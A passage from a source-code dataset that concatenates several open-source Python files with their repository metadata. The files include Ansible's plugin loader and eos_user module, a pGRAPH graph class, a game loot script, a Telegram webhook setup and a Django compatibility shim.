PATH_CACHE = PATH_CACHE[self.class_name],
PLUGIN_PATH_CACHE = PLUGIN_PATH_CACHE[self.class_name],
)
def print_paths(self):
''' Returns a string suitable for printing of the search path '''
# Uses a list to get the order right
ret = []
for i in self._get_paths():
if i not in ret:
ret.append(i)
return os.pathsep.join(ret)
def _all_directories(self, dir):
results = []
results.append(dir)
for root, subdirs, files in os.walk(dir):
if '__init__.py' in files:
for x in subdirs:
results.append(os.path.join(root,x))
return results
def _get_package_paths(self):
''' Gets the path of a Python package '''
paths = []
if not self.package:
return []
if not hasattr(self, 'package_path'):
m = __import__(self.package)
parts = self.package.split('.')[1:]
self.package_path = os.path.join(os.path.dirname(m.__file__), *parts)
paths.extend(self._all_directories(self.package_path))
return paths
def _get_paths(self):
''' Return a list of paths to search for plugins in '''
if self._paths is not None:
return self._paths
ret = self._extra_dirs[:]
# look in any configured plugin paths, allow one level deep for subcategories
if self.config is not None:
configured_paths = self.config.split(os.pathsep)
for path in configured_paths:
path = os.path.realpath(os.path.expanduser(path))
contents = glob.glob("%s/*" % path) + glob.glob("%s/*/*" % path)
for c in contents:
if os.path.isdir(c) and c not in ret:
ret.append(c)
if path not in ret:
ret.append(path)
# look for any plugins installed in the package subtree
ret.extend(self._get_package_paths())
# HACK: because powershell modules are in the same directory
# hierarchy as other modules we have to process them last. This is
# because powershell only works on windows but the other modules work
# anywhere (possibly including windows if the correct language
# interpreter is installed). the non-powershell modules can have any
# file extension and thus powershell modules are picked up in that.
# The non-hack way to fix this is to have powershell modules be
# a different PluginLoader/ModuleLoader. But that requires changing
# other things too (known thing to change would be PATHS_CACHE,
# PLUGIN_PATHS_CACHE, and MODULE_CACHE. Since those three dicts key
# on the class_name and neither regular modules nor powershell modules
# would have class_names, they would not work as written.
reordered_paths = []
win_dirs = []
for path in ret:
if path.endswith('windows'):
win_dirs.append(path)
else:
reordered_paths.append(path)
reordered_paths.extend(win_dirs)
# cache and return the result
self._paths = reordered_paths
return reordered_paths
def add_directory(self, directory, with_subdir=False):
''' Adds an additional directory to the search path '''
directory = os.path.realpath(directory)
if directory is not None:
if with_subdir:
directory = os.path.join(directory, self.subdir)
if directory not in self._extra_dirs:
# append the directory and invalidate the path cache
self._extra_dirs.append(directory)
self._paths = None
def find_plugin(self, name, mod_type=''):
''' Find a plugin named name '''
# The particular cache to look for modules within. This matches the
# requested mod_type
pull_cache = self._plugin_path_cache[mod_type]
try:
return pull_cache[name]
except KeyError:
# Cache miss. Now let's find the plugin
pass
if mod_type:
suffix = mod_type
elif self.class_name:
# Ansible plugins that run in the controller process (most plugins)
suffix = '.py'
else:
# Only Ansible Modules. Ansible modules can be any executable so
# they can have any suffix
suffix = ''
### FIXME:
# Instead of using the self._paths cache (PATH_CACHE) and
# self._searched_paths we could use an iterator. Before enabling that
# we need to make sure we don't want to add additional directories
# (add_directory()) once we start using the iterator. Currently, it
# looks like _get_paths() never forces a cache refresh so if we expect
# additional directories to be added later, it is buggy.
for path in (p for p in self._get_paths() if p not in self._searched_paths and os.path.isdir(p)):
try:
full_paths = (os.path.join(path, f) for f in os.listdir(path))
except OSError as e:
display.warning("Error accessing plugin paths: %s" % str(e))
for full_path in (f for f in full_paths if os.path.isfile(f) and not f.endswith('__init__.py')):
full_name = os.path.basename(full_path)
# HACK: We have no way of executing python byte
# compiled files as ansible modules so specifically exclude them
if full_path.endswith(('.pyc', '.pyo')):
continue
splitname = os.path.splitext(full_name)
base_name = splitname[0]
try:
extension = splitname[1]
except IndexError:
extension = ''
# Module found, now enter it into the caches that match
# this file
if base_name not in self._plugin_path_cache['']:
self._plugin_path_cache[''][base_name] = full_path
if full_name not in self._plugin_path_cache['']:
self._plugin_path_cache[''][full_name] = full_path
if base_name not in self._plugin_path_cache[extension]:
self._plugin_path_cache[extension][base_name] = full_path
if full_name not in self._plugin_path_cache[extension]:
self._plugin_path_cache[extension][full_name] = full_path
self._searched_paths.add(path)
try:
return pull_cache[name]
except KeyError:
# Didn't find the plugin in this directory. Load modules from
# the next one
pass
# if nothing is found, try finding alias/deprecated
if not name.startswith('_'):
alias_name = '_' + name
# We've already cached all the paths at this point
if alias_name in pull_cache:
if not os.path.islink(pull_cache[alias_name]):
display.deprecated('%s is kept for backwards compatibility '
'but usage is discouraged. The module '
'documentation details page may explain '
'more about this rationale.' %
name.lstrip('_'))
return pull_cache[alias_name]
return None
def has_plugin(self, name):
''' Checks if a plugin named name exists '''
return self.find_plugin(name) is not None
__contains__ = has_plugin
def _load_module_source(self, name, path):
with open(path, 'r') as module_file:
module = imp.load_source(name, path, module_file)
return module
def get(self, name, *args, **kwargs):
''' instantiates a plugin of the given name using arguments '''
if name in self.aliases:
name = self.aliases[name]
path = self.find_plugin(name)
if path is None:
return None
if path not in self._module_cache:
self._module_cache[path] = self._load_module_source('.'.join([self.package, name]), path)
if kwargs.get('class_only', False):
obj = getattr(self._module_cache[path], self.class_name)
else:
obj = getattr(self._module_cache[path], self.class_name)(*args, **kwargs)
if self.base_class and self.base_class not in [base.__name__ for base in obj.__class__.__bases__]:
return None
return obj
def all(self, *args, **kwargs):
''' instantiates all plugins with the same arguments '''
for i in self._get_paths():
matches = glob.glob(os.path.join(i, "*.py"))
matches.sort()
for path in matches:
name, _ = os.path.splitext(path)
if '__init__' in name:
continue
if path not in self._module_cache:
with warnings.catch_warnings():
warnings.simplefilter("ignore", RuntimeWarning)
self._module_cache[path] = self._load_module_source(name, path)
if kwargs.get('class_only', False):
obj = getattr(self._module_cache[path], self.class_name)
else:
obj = getattr(self._module_cache[path], self.class_name)(*args, **kwargs)
if self.base_class and self.base_class not in [base.__name__ for base in obj.__class__.__bases__]:
continue
# set extra info on the module, in case we want it later
setattr(obj, '_original_path', path)
yield obj
action_loader = PluginLoader(
'ActionModule',
'ansible.plugins.action',
C.DEFAULT_ACTION_PLUGIN_PATH,
'action_plugins',
required_base_class='ActionBase',
)
cache_loader = PluginLoader(
'CacheModule',
'ansible.plugins.cache',
C.DEFAULT_CACHE_PLUGIN_PATH,
'cache_plugins',
)
callback_loader = PluginLoader(
'CallbackModule',
'ansible.plugins.callback',
C.DEFAULT_CALLBACK_PLUGIN_PATH,
'callback_plugins',
)
connection_loader = PluginLoader(
'Connection',
'ansible.plugins.connection',
C.DEFAULT_CONNECTION_PLUGIN_PATH,
'connection_plugins',
aliases={'paramiko': 'paramiko_ssh'},
required_base_class='ConnectionBase',
)
shell_loader = PluginLoader(
'ShellModule',
'ansible.plugins.shell',
'shell_plugins',
'shell_plugins',
)
module_loader = PluginLoader(
'',
'ansible.modules',
C.DEFAULT_MODULE_PATH,
'library',
)
lookup_loader = PluginLoader(
'LookupModule',
'ansible.plugins.lookup',
C.DEFAULT_LOOKUP_PLUGIN_PATH,
'lookup_plugins',
required_base_class='LookupBase',
)
vars_loader = PluginLoader(
'VarsModule',
'ansible.plugins.vars',
C.DEFAULT_VARS_PLUGIN_PATH,
'vars_plugins',
)
filter_loader = PluginLoader(
'FilterModule',
'ansible.plugins.filter',
C.DEFAULT_FILTER_PLUGIN_PATH,
'filter_plugins',
)
test_loader = PluginLoader(
'TestModule',
'ansible.plugins.test',
C.DEFAULT_TEST_PLUGIN_PATH,
'test_plugins'
)
fragment_loader = PluginLoader(
'ModuleDocFragment',
'ansible.utils.module_docs_fragments',
os.path.join(os.path.dirname(__file__), 'module_docs_fragments'),
'',
)
strategy_loader = PluginLoader(
'StrategyModule',
'ansible.plugins.strategy',
None,
'strategy_plugins',
required_base_class='StrategyBase',
)
|
fdupoux/ansible
|
lib/ansible/plugins/__init__.py
|
Python
|
gpl-3.0
| 15,547
|
def itemTemplate():
return ['object/tangible/loot/creature_loot/collections/shared_housing_improvement_04.iff']
def lootDescriptor():
return 'customattributes'
def customizationAttributes():
return ['/private/index_color_1']
def customizationValues():
return [9]
def STFparams():
return ['static_item_n','item_collection_housing_improvement_04_09','static_item_d','item_collection_housing_improvement_04_09']
def AddToCollection():
return 'housing_improvement_04'
def CollectionItemName():
return 'housing_improvement_04_09'
def stackable():
return 1
|
agry/NGECore2
|
scripts/loot/lootItems/collections/housing_improvements/cabinetry_techniques/cabinetry_techniques_9.py
|
Python
|
lgpl-3.0
| 600
|
#
# pGRAPH
# Copyright (C) 2006 Pedram Amini <pedram.amini@gmail.com>
#
# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program; if not, write to the Free
# Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
'''
@author: Pedram Amini
@license: GNU General Public License 2.0 or later
@contact: pedram.amini@gmail.com
@organization: www.openrce.org
'''
import node
import edge
import cluster
import copy
class graph (object):
'''
@todo: Add support for clusters
@todo: Potentially swap node list with a node dictionary for increased performance
'''
####################################################################################################################
def __init__ (self, id = None):
'''
'''
self.id = id
self.clusters = []
self.edges = {}
self.nodes = {}
####################################################################################################################
def add_cluster (self, cluster):
'''
Add a pgraph cluster to the graph.
@type cluster: pGRAPH Cluster
@param cluster: Cluster to add to graph
'''
self.clusters.append(cluster)
return self
####################################################################################################################
def add_edge (self, edge, prevent_dups=True):
'''
Add a pgraph edge to the graph. Ensures a node exists for both the source and destination of the edge.
@type edge: pGRAPH Edge
@param edge: Edge to add to graph
@type prevent_dups: Boolean
@param prevent_dups: (Optional, Def=True) Flag controlling whether or not the addition of duplicate edges is ok
'''
if prevent_dups:
if self.edges.has_key(edge.id):
return self
# ensure the source and destination nodes exist.
if self.find_node("id", edge.src) and self.find_node("id", edge.dst):
self.edges[edge.id] = edge
return self
####################################################################################################################
def add_graph (self, other_graph):
'''
Alias of graph_cat(). Concatenate the other graph into the current one.
@todo: Add support for clusters
@see: graph_cat()
@type other_graph: pgraph.graph
@param other_graph: Graph to concatenate into this one.
'''
return self.graph_cat(other_graph)
####################################################################################################################
def add_node (self, node):
'''
Add a pgraph node to the graph. Ensures a node with the same id does not already exist in the graph.
@type node: pGRAPH Node
@param node: Node to add to graph
'''
node.number = len(self.nodes)
if not self.nodes.has_key(node.id):
self.nodes[node.id] = node
return self
####################################################################################################################
def del_cluster (self, id):
'''
Remove a cluster from the graph.
@type id: Mixed
@param id: Identifier of cluster to remove from graph
'''
for cluster in self.clusters:
if cluster.id == id:
self.clusters.remove(cluster)
break
return self
####################################################################################################################
def del_edge (self, id=None, src=None, dst=None):
'''
Remove an edge from the graph. There are two ways to call this routine, with an edge id::
graph.del_edge(id)
or by specifying the edge source and destination::
graph.del_edge(src=source, dst=destination)
@type id: Mixed
@param id: (Optional) Identifier of edge to remove from graph
@type src: Mixed
@param src: (Optional) Source of edge to remove from graph
@type dst: Mixed
@param dst: (Optional) Destination of edge to remove from graph
'''
if not id:
id = (src << 32) + dst
if self.edges.has_key(id):
del self.edges[id]
return self
####################################################################################################################
def del_graph (self, other_graph):
'''
Alias of graph_sub(). Remove the elements shared between the current graph and other graph from the current
graph.
@todo: Add support for clusters
@see: graph_sub()
@type other_graph: pgraph.graph
@param other_graph: Graph to diff/remove against
'''
return self.graph_sub(other_graph)
####################################################################################################################
def del_node (self, id):
'''
Remove a node from the graph.
@type node_id: Mixed
@param node_id: Identifier of node to remove from graph
'''
if self.nodes.has_key(id):
del self.nodes[id]
return self
####################################################################################################################
def edges_from (self, id):
'''
Enumerate the edges from the specified node.
@type id: Mixed
@param id: Identifier of node to enumerate edges from
@rtype: List
@return: List of edges from the specified node
'''
return [edge for edge in self.edges.values() if edge.src == id]
####################################################################################################################
def edges_to (self, id):
'''
Enumerate the edges to the specified node.
@type id: Mixed
@param id: Identifier of node to enumerate edges to
@rtype: List
@return: List of edges to the specified node
'''
return [edge for edge in self.edges.values() if edge.dst == id]
####################################################################################################################
def find_cluster (self, attribute, value):
'''
Find and return the cluster with the specified attribute / value pair.
@type attribute: String
@param attribute: Attribute name we are looking for
@type value: Mixed
@param value: Value of attribute we are looking for
@rtype: Mixed
@return: Cluster, if attribute / value pair is matched. None otherwise.
'''
for cluster in self.clusters:
if hasattr(cluster, attribute):
if getattr(cluster, attribute) == value:
return cluster
return None
####################################################################################################################
def find_cluster_by_node (self, attribute, value):
'''
Find and return the cluster that contains the node with the specified attribute / value pair.
@type attribute: String
@param attribute: Attribute name we are looking for
@type value: Mixed
@param value: Value of attribute we are looking for
@rtype: Mixed
@return: Cluster, if node with attribute / value pair is matched. None otherwise.
'''
for cluster in self.clusters:
for node in cluster:
if hasattr(node, attribute):
if getattr(node, attribute) == value:
return cluster
return None
####################################################################################################################
def find_edge (self, attribute, value):
'''
Find and return the edge with the specified attribute / value pair.
@type attribute: String
@param attribute: Attribute name we are looking for
@type value: Mixed
@param value: Value of attribute we are looking for
@rtype: Mixed
@return: Edge, if attribute / value pair is matched. None otherwise.
'''
# if the attribute to search for is the id, simply return the edge from the internal hash.
if attribute == "id" and self.edges.has_key(value):
return self.edges[value]
# step through all the edges looking for the given attribute/value pair.
else:
for edge in self.edges.values():
if hasattr(edge, attribute):
if getattr(edge, attribute) == value:
return edge
return None
####################################################################################################################
def find_node (self, attribute, value):
'''
Find and return the node with the specified attribute / value pair.
@type attribute: String
@param attribute: Attribute name we are looking for
@type value: Mixed
@param value: Value of attribute we are looking for
@rtype: Mixed
@return: Node, if attribute / value pair is matched. None otherwise.
'''
# if the attribute to search for is the id, simply return the node from the internal hash.
if attribute == "id" and self.nodes.has_key(value):
return self.nodes[value]
# step through all the nodes looking for the given attribute/value pair.
else:
for node in self.nodes.values():
if hasattr(node, attribute):
if getattr(node, attribute) == value:
return node
return None
####################################################################################################################
def graph_cat (self, other_graph):
'''
Concatenate the other graph into the current one.
@todo: Add support for clusters
@type other_graph: pgraph.graph
@param other_graph: Graph to concatenate into this one.
'''
for other_node in other_graph.nodes.values():
self.add_node(other_node)
for other_edge in other_graph.edges.values():
self.add_edge(other_edge)
return self
####################################################################################################################
def graph_down (self, from_node_id, max_depth=-1):
'''
Create a new graph, looking down, from the specified node id to the specified depth.
@type from_node_id: pgraph.node
@param from_node_id: Node to use as start of down graph
@type max_depth: Integer
@param max_depth: (Optional, Def=-1) Number of levels to include in down graph (-1 for infinite)
@rtype: pgraph.graph
@return: Down graph around specified node.
'''
down_graph = graph()
from_node = self.find_node("id", from_node_id)
if not from_node:
print "unable to resolve node %08x" % from_node_id
raise Exception
levels_to_process = []
current_depth = 1
levels_to_process.append([from_node])
for level in levels_to_process:
next_level = []
if current_depth > max_depth and max_depth != -1:
break
for node in level:
down_graph.add_node(copy.copy(node))
for edge in self.edges_from(node.id):
to_add = self.find_node("id", edge.dst)
if not down_graph.find_node("id", edge.dst):
next_level.append(to_add)
down_graph.add_node(copy.copy(to_add))
down_graph.add_edge(copy.copy(edge))
if next_level:
levels_to_process.append(next_level)
current_depth += 1
return down_graph
####################################################################################################################
def graph_intersect (self, other_graph):
'''
Remove all elements from the current graph that do not exist in the other graph.
@todo: Add support for clusters
@type other_graph: pgraph.graph
@param other_graph: Graph to intersect with
'''
for node in self.nodes.values():
if not other_graph.find_node("id", node.id):
self.del_node(node.id)
for edge in self.edges.values():
if not other_graph.find_edge("id", edge.id):
self.del_edge(edge.id)
return self
####################################################################################################################
def graph_proximity (self, center_node_id, max_depth_up=2, max_depth_down=2):
'''
Create a proximity graph centered around the specified node.
@type center_node_id: pgraph.node
@param center_node_id: Node to use as center of proximity graph
@type max_depth_up: Integer
@param max_depth_up: (Optional, Def=2) Number of upward levels to include in proximity graph
@type max_depth_down: Integer
@param max_depth_down: (Optional, Def=2) Number of downward levels to include in proximity graph
@rtype: pgraph.graph
@return: Proximity graph around specified node.
'''
prox_graph = self.graph_down(center_node_id, max_depth_down)
prox_graph.add_graph(self.graph_up(center_node_id, max_depth_up))
return prox_graph
####################################################################################################################
def graph_sub (self, other_graph):
'''
Remove the elements shared between the current graph and other graph from the current
graph.
@todo: Add support for clusters
@type other_graph: pgraph.graph
@param other_graph: Graph to diff/remove against
'''
for other_node in other_graph.nodes.values():
self.del_node(other_node.id)
for other_edge in other_graph.edges.values():
self.del_edge(None, other_edge.src, other_edge.dst)
return self
####################################################################################################################
def graph_up (self, from_node_id, max_depth=-1):
'''
Create a new graph, looking up, from the specified node id to the specified depth.
@type from_node_id: pgraph.node
@param from_node_id: Node to use as start of up graph
@type max_depth: Integer
@param max_depth: (Optional, Def=-1) Number of levels to include in up graph (-1 for infinite)
@rtype: pgraph.graph
@return: Up graph to the specified node.
'''
up_graph = graph()
from_node = self.find_node("id", from_node_id)
levels_to_process = []
current_depth = 1
levels_to_process.append([from_node])
for level in levels_to_process:
next_level = []
if current_depth > max_depth and max_depth != -1:
break
for node in level:
up_graph.add_node(copy.copy(node))
for edge in self.edges_to(node.id):
to_add = self.find_node("id", edge.src)
if not up_graph.find_node("id", edge.src):
next_level.append(to_add)
up_graph.add_node(copy.copy(to_add))
up_graph.add_edge(copy.copy(edge))
if next_level:
levels_to_process.append(next_level)
current_depth += 1
return up_graph
####################################################################################################################
def render_graph_gml (self):
'''
Render the GML graph description.
@rtype: String
@return: GML graph description.
'''
gml = 'Creator "pGRAPH - Pedram Amini <pedram.amini@gmail.com>"\n'
gml += 'directed 1\n'
# open the graph tag.
gml += 'graph [\n'
# add the nodes to the GML definition.
for node in self.nodes.values():
gml += node.render_node_gml(self)
# add the edges to the GML definition.
for edge in self.edges.values():
gml += edge.render_edge_gml(self)
# close the graph tag.
gml += ']\n'
"""
TODO: Complete cluster rendering
# if clusters exist.
if len(self.clusters):
# open the rootcluster tag.
gml += 'rootcluster [\n'
# add the clusters to the GML definition.
for cluster in self.clusters:
gml += cluster.render()
# add the clusterless nodes to the GML definition.
for node in self.nodes:
if not self.find_cluster_by_node("id", node.id):
gml += ' vertex "%d"\n' % node.id
# close the rootcluster tag.
gml += ']\n'
"""
return gml
####################################################################################################################
def render_graph_graphviz (self):
'''
Render the graphviz graph structure.
@rtype: pydot.Dot
@return: Pydot object representing entire graph
'''
import pydot
dot_graph = pydot.Dot()
for node in self.nodes.values():
dot_graph.add_node(node.render_node_graphviz(self))
for edge in self.edges.values():
dot_graph.add_edge(edge.render_edge_graphviz(self))
return dot_graph
####################################################################################################################
def render_graph_udraw (self):
'''
Render the uDraw graph description.
@rtype: String
@return: uDraw graph description.
'''
udraw = '['
# render each of the nodes in the graph.
# the individual nodes will handle their own edge rendering.
for node in self.nodes.values():
udraw += node.render_node_udraw(self)
udraw += ','
# trim the extraneous comment and close the graph.
udraw = udraw[0:-1] + ']'
return udraw
####################################################################################################################
def render_graph_udraw_update (self):
'''
Render the uDraw graph update description.
@rtype: String
@return: uDraw graph description.
'''
udraw = '['
for node in self.nodes.values():
udraw += node.render_node_udraw_update()
udraw += ','
for edge in self.edges.values():
udraw += edge.render_edge_udraw_update()
udraw += ','
# trim the extraneous comment and close the graph.
udraw = udraw[0:-1] + ']'
return udraw
####################################################################################################################
def update_node_id (self, current_id, new_id):
'''
Simply updating the id attribute of a node will sever the edges to / from the given node. This routine will
correctly update the edges as well.
@type current_id: Long
@param current_id: Current ID of node whose ID we want to update
@type new_id: Long
@param new_id: New ID to update to.
'''
if not self.nodes.has_key(current_id):
return
# update the node.
node = self.nodes[current_id]
del self.nodes[current_id]
node.id = new_id
self.nodes[node.id] = node
# update the edges.
for edge in [edge for edge in self.edges.values() if current_id in (edge.src, edge.dst)]:
del self.edges[edge.id]
if edge.src == current_id:
edge.src = new_id
if edge.dst == current_id:
edge.dst = new_id
edge.id = (edge.src << 32) + edge.dst
self.edges[edge.id] = edge
####################################################################################################################
def sorted_nodes (self):
'''
Return a list of the nodes within the graph, sorted by id.
@rtype: List
@return: List of nodes, sorted by id.
'''
node_keys = self.nodes.keys()
node_keys.sort()
return [self.nodes[key] for key in node_keys]
|
pmquang/FuzzLabs
|
modules/jobshandler/sulley/pgraph/graph.py
|
Python
|
gpl-2.0
| 21,677
|
import telepot
from keys import telegram_api_key, telegram_bot_url
bot = telepot.Bot(telegram_api_key)
bot.setWebhook(telegram_bot_url)
|
timokoola/timoechobot
|
telegramsetup.py
|
Python
|
apache-2.0
| 136
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: eos_user
version_added: "2.3"
author: "Peter Sprygada (@privateip)"
short_description: Manage the collection of local users on EOS devices
description:
- This module provides declarative management of the local usernames
configured on Arista EOS devices. It allows playbooks to manage
either individual usernames or the collection of usernames in the
current running config. It also supports purging usernames from the
configuration that are not explicitly defined.
notes:
- This module requires connection to be network_cli
options:
users:
description:
- The set of username objects to be configured on the remote
Arista EOS device. The list entries can either be the username
or a hash of username and properties. This argument is mutually
exclusive with the C(username) argument.
required: false
default: null
username:
description:
- The username to be configured on the remote Arista EOS
device. This argument accepts a stringv value and is mutually
exclusive with the C(users) argument.
required: false
default: null
update_password:
description:
- Since passwords are encrypted in the device running config, this
argument will instruct the module when to change the password. When
set to C(always), the password will always be updated in the device
and when set to C(on_create) the password will be updated only if
the username is created.
required: false
default: always
choices: ['on_create', 'always']
privilege:
description:
- The C(privilege) argument configures the privilege level of the
user when logged into the system. This argument accepts integer
values in the range of 1 to 15.
required: false
default: null
role:
description:
- The C(role) argument configures the role for the username in the
device running configuration. The argument accepts a string value
defining the role name. This argument does not check if the role
has been configured on the device.
required: false
default: null
sshkey:
description:
- The C(sshkey) argument defines the SSH public key to configure
for the username. This argument accepts a valid SSH key value.
required: false
default: null
nopassword:
description:
- The C(nopassword) argument defines the username without assigning
a password. This will allow the user to login to the system
without being authenticated by a password. This argument accepts
boolean values.
required: false
default: null
choices: ['true', 'false']
purge:
description:
- The C(purge) argument instructs the module to consider the
resource definition absolute. It will remove any previously
configured usernames on the device with the exception of the
`admin` user which cannot be deleted per EOS constraints.
required: false
default: false
state:
description:
- The C(state) argument configures the state of the uername definition
as it relates to the device operational configuration. When set
to I(present), the username(s) should be configured in the device active
configuration and when set to I(absent) the username(s) should not be
in the device active configuration
required: false
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: create a new user
eos_user:
username: ansible
sshkey: "{{ lookup('file', '~/.ssh/id_rsa.pub') }}"
state: present
- name: remove all users except admin
eos_user:
purge: yes
- name: set multiple users to privilege level
users:
- username: netop
- username: netend
privilege: 15
state: present
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- username ansible secret password
- username admin secret admin
session_name:
description: The EOS config session name used to load the configuration
returned: when changed is True
type: str
sample: ansible_1479315771
start:
description: The time the job started
returned: always
type: str
sample: "2016-11-16 10:38:15.126146"
end:
description: The time the job ended
returned: always
type: str
sample: "2016-11-16 10:38:25.595612"
delta:
description: The time elapsed to perform all operations
returned: always
type: str
sample: "0:00:10.469466"
"""
import re
from functools import partial
from ansible.module_utils.local import LocalAnsibleModule
from ansible.module_utils.eos import get_config, load_config
from ansible.module_utils.six import iteritems
def validate_privilege(value, module):
if not 1 <= value <= 15:
module.fail_json(msg='privilege must be between 1 and 15, got %s' % value)
def map_obj_to_commands(updates, module):
commands = list()
state = module.params['state']
update_password = module.params['update_password']
for update in updates:
want, have = update
needs_update = lambda x: want.get(x) and (want.get(x) != have.get(x))
add = lambda x: commands.append('username %s %s' % (want['username'], x))
if want['state'] == 'absent':
commands.append('no username %s' % want['username'])
continue
if needs_update('role'):
add('role %s' % want['role'])
if needs_update('privilege'):
add('privilege %s' % want['privilege'])
if needs_update('password'):
if update_password == 'always' or not have:
add('secret %s' % want['password'])
if needs_update('sshkey'):
add('sshkey %s' % want['sshkey'])
if needs_update('nopassword'):
if want['nopassword']:
add('nopassword')
else:
add('no username %s nopassword' % want['username'])
return commands
def parse_role(data):
match = re.search(r'role (\S+)', data, re.M)
if match:
return match.group(1)
def parse_sshkey(data):
match = re.search(r'sshkey (.+)$', data, re.M)
if match:
return match.group(1)
def parse_privilege(data):
match = re.search(r'privilege (\S+)', data, re.M)
if match:
return int(match.group(1))
def map_config_to_obj(module):
data = get_config(module, flags=['section username'])
match = re.findall(r'^username (\S+)', data, re.M)
if not match:
return list()
instances = list()
for user in set(match):
regex = r'username %s .+$' % user
cfg = re.findall(r'username %s .+$' % user, data, re.M)
cfg = '\n'.join(cfg)
obj = {
'username': user,
'state': 'present',
'nopassword': 'nopassword' in cfg,
'password': None,
'sshkey': parse_sshkey(cfg),
'privilege': parse_privilege(cfg),
'role': parse_role(cfg)
}
instances.append(obj)
return instances
def get_param_value(key, item, module):
# if key doesn't exist in the item, get it from module.params
if not item.get(key):
value = module.params[key]
# if key does exist, do a type check on it to validate it
else:
value_type = module.argument_spec[key].get('type', 'str')
type_checker = module._CHECK_ARGUMENT_TYPES_DISPATCHER[value_type]
type_checker(item[key])
value = item[key]
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if all((value, validator)):
validator(value, module)
return value
def map_params_to_obj(module):
users = module.params['users']
if not users:
if not module.params['username'] and module.params['purge']:
return list()
elif not module.params['username']:
module.fail_json(msg='username is required')
else:
collection = [{'username': module.params['username']}]
else:
collection = list()
for item in users:
if not isinstance(item, dict):
collection.append({'username': item})
elif 'username' not in item:
module.fail_json(msg='username is required')
else:
collection.append(item)
objects = list()
for item in collection:
get_value = partial(get_param_value, item=item, module=module)
item['password'] = get_value('password')
item['nopassword'] = get_value('nopassword')
item['privilege'] = get_value('privilege')
item['role'] = get_value('role')
item['sshkey'] = get_value('sshkey')
item['state'] = get_value('state')
objects.append(item)
return objects
def update_objects(want, have):
updates = list()
for entry in want:
item = next((i for i in have if i['username'] == entry['username']), None)
if all((item is None, entry['state'] == 'present')):
updates.append((entry, {}))
elif item:
for key, value in iteritems(entry):
if value and value != item[key]:
updates.append((entry, item))
return updates
def main():
""" main entry point for module execution
"""
argument_spec = dict(
users=dict(type='list', no_log=True),
username=dict(),
password=dict(no_log=True),
nopassword=dict(type='bool'),
update_password=dict(default='always', choices=['on_create', 'always']),
privilege=dict(type='int'),
role=dict(),
sshkey=dict(),
purge=dict(type='bool', default=False),
state=dict(default='present', choices=['present', 'absent'])
)
mutually_exclusive = [('username', 'users')]
module = LocalAnsibleModule(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
result = {'changed': False}
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands(update_objects(want, have), module)
if module.params['purge']:
want_users = [x['username'] for x in want]
have_users = [x['username'] for x in have]
for item in set(have_users).difference(want_users):
if item != 'admin':
commands.append('no username %s' % item)
result['commands'] = commands
# the eos cli prevents this by rule so capture it and display
# a nice failure message
if 'no username admin' in commands:
module.fail_json(msg='cannot delete the `admin` account')
if commands:
commit = not module.check_mode
response = load_config(module, commands, commit=commit)
if response.get('diff') and module._diff:
result['diff'] = {'prepared': response.get('diff')}
result['session_name'] = response.get('session')
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
bmanojlovic/ansible
|
lib/ansible/modules/network/eos/eos_user.py
|
Python
|
gpl-3.0
| 11,924
|
import django
from functools import partial
from sys import version_info
from django.shortcuts import render
from django.template.loader import render_to_string
from django.template.response import TemplateResponse as BaseTemplateResponse
if django.VERSION < (1, 6):
from django.conf.urls.defaults import include, url
else:
from django.conf.urls import include, url
if django.VERSION < (2, 0):
from django.core.urlresolvers import reverse, NoReverseMatch
else:
from django.urls import reverse, NoReverseMatch
def patterns(*urls):
if django.VERSION < (1, 6):
from django.conf.urls.defaults import patterns
return patterns('', *urls)
elif django.VERSION < (1, 10):
from django.conf.urls import patterns
return patterns('', *urls)
return list(urls)
if django.VERSION >= (1, 9):
if django.VERSION < (2, 0):
from django.template.library import parse_bits
else:
def parse_bits(parser, bits, params, varargs, varkw, defaults,
takes_context, name):
from django.template import library
return library.parse_bits(
parser=parser, bits=bits, params=params, varargs=varargs,
varkw=varkw, defaults=defaults, kwonly=(), kwonly_defaults=(),
takes_context=takes_context, name=name)
def generic_tag_compiler(parser, token, params, varargs, varkw, defaults,
name, takes_context, node_class):
"""
Returns a template.Node subclass.
This got inlined into django.template.library since Django since 1.9, this here
is a copypasta replacement:
https://github.com/django/django/blob/stable/1.8.x/django/template/base.py#L1089
"""
bits = token.split_contents()[1:]
args, kwargs = parse_bits(parser, bits, params, varargs, varkw,
defaults, takes_context, name)
return node_class(takes_context, args, kwargs)
else:
from django.template.base import parse_bits
from django.template.base import generic_tag_compiler # noqa
if django.VERSION >= (1, 8):
# Always use the Django template engine on Django 1.8.
render_to_string = partial(render_to_string, using='django')
render = partial(render, using='django')
class TemplateResponse(BaseTemplateResponse):
def __init__(self, *args, **kwargs):
kwargs['using'] = 'django'
super(TemplateResponse, self).__init__(*args, **kwargs)
else:
TemplateResponse = BaseTemplateResponse
if django.VERSION < (1, 9):
from django.core.cache import get_cache
else:
from django.core.cache import caches
def get_cache(name):
return caches[name]
if version_info < (3,):
from inspect import getargspec
else:
from collections import namedtuple
from inspect import getfullargspec
ArgSpec = namedtuple('ArgSpec', ['args', 'varargs', 'keywords', 'defaults'])
def getargspec(func):
spec = getfullargspec(func)
return ArgSpec(
args=spec.args,
varargs=spec.varargs,
keywords=spec.varkw,
defaults=spec.defaults,
